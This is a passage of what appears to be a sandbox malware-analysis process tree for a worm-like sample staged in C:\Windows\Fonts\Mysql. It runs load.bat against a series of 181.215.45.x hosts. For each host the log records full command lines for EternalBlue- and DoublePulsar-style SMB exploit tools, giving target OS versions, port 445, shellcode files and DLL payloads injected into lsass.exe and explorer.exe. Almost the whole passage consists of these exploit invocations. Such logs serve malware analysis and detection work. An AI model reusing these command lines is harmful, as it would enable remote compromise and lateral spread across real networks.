C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.86 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:6288
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.86 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8580
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.86 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.86.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Location Discovery: System Language Discovery
- System Time Discovery
PID:8780
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.86 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:5324
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.86 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:9836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.923⤵PID:11284
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.92 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.92.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:11084
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.92 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.92.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:10512
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.92 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:12244
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.92 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:6528
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.92 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- System Time Discovery
PID:7412
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.92 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9024
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.92 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:1228
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.92 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.92.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:9916
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.92 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- Drops file in Windows directory
PID:9548
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.92 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.933⤵PID:6268
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.93 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.93.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:6644
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.93 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.93.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:10144
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.93 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:11052
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.93 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- Drops file in Windows directory
PID:11624
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.93 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- System Time Discovery
PID:6656
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.93 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:8700
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.93 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8936
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.93 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.93.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:8628
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.93 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9396
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.93 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.953⤵
- System Location Discovery: System Language Discovery
PID:11412 -
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.95 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.95.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵
- System Time Discovery
PID:10716
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.95 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.95.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:11752
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.95 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:12212
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.95 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:11692
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.95 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:5336
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.95 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:8556
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.95 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8320
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.95 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.95.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:2404
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.95 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:10212
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.95 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:2400
-
-
-
C:\Windows\SysWOW64\PING.EXEping 127.1 -n 383⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.1413⤵PID:7796
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.141 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.141.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵
- System Time Discovery
PID:5152
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.141 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.141.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:10716
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.141 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:10944
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.141 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:6628
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.141 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- System Time Discovery
PID:7940
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.141 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9008
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.141 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:6068
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.141 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.141.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Location Discovery: System Language Discovery
PID:620
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.141 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:10156
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.141 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:10832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.1393⤵PID:10768
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.139 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.139.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:11020
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.139 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.139.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:2716
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.139 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:5140
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.139 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:320
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.139 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵
- Drops file in Windows directory
PID:8460
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.139 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:8624
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.139 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- Drops file in Windows directory
PID:7776
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.139 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.139.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:5392
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.139 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9396
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.139 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:11572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.1423⤵PID:9340
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.142 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.142.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:10812
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.142 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.142.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- Drops file in Windows directory
PID:12116
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.142 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:12264
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.142 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:7596
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.142 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:12284
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.142 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:6304
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.142 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:8668
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.142 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.142.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:9648
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.142 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:10868
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.142 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:6268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.1433⤵PID:6644
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.143 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.143.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵PID:11668
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.143 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.143.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:12120
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.143 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:12208
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.143 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:772
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.143 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:3152
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.143 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:8896
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.143 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9056
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.143 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.143.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Time Discovery
PID:9344
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.143 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:5000
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.143 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:9508
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.1513⤵PID:11216
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --NetworkTimeout 60 --TargetIp 181.215.45.151 --TargetPort 445 --OutputFile C:\Windows\Fonts\Mysql\181.215.45.151.c --Protocol SMB --Architecture x64 --Funciton OutputInstall4⤵
- System Time Discovery
PID:10248
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig A.txt --Target SERVER_2008_SP1 --TargetIp 181.215.45.151 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.151.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵PID:12244
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig B.txt --TargetIp 181.215.45.151 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:7360
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig C.txt --TargetIp 181.215.45.151 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵
- System Location Discovery: System Language Discovery
PID:7512
-
-
C:\Windows\Fonts\Mysql\Eter.exeEter.exe --TargetIp 181.215.45.151 --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig E.txt4⤵PID:8404
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig D.txt --TargetIp 181.215.45.151 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:4220
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig F.txt --TargetIp 181.215.45.151 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:9040
-
-
C:\Windows\Fonts\Mysql\mance.exemance.exe --OutConfig G.txt --Target SERVER_2003_SP2 --TargetIp 181.215.45.151 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --ShellcodeFile C:\\Windows\\Fonts\\Mysql\\181.215.45.151.c --ValidateOnly false --ExploitMethod Default --Credentials Anonymous --Protocol SMB4⤵
- System Location Discovery: System Language Discovery
- System Time Discovery
PID:8744
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig H.txt --TargetIp 181.215.45.151 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Eternalblue.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll4⤵PID:10044
-
-
C:\Windows\Fonts\Mysql\puls.exepuls.exe --OutConfig I.txt --TargetIp 181.215.45.151 --TargetPort 445 --DllPayload C:\Windows\Fonts\Mysql\Doublepulsar.dll --DllOrdinal 1 ProcessName explorer.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll4⤵PID:8312
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K load.bat 181.215.45.1503⤵PID:9408
-
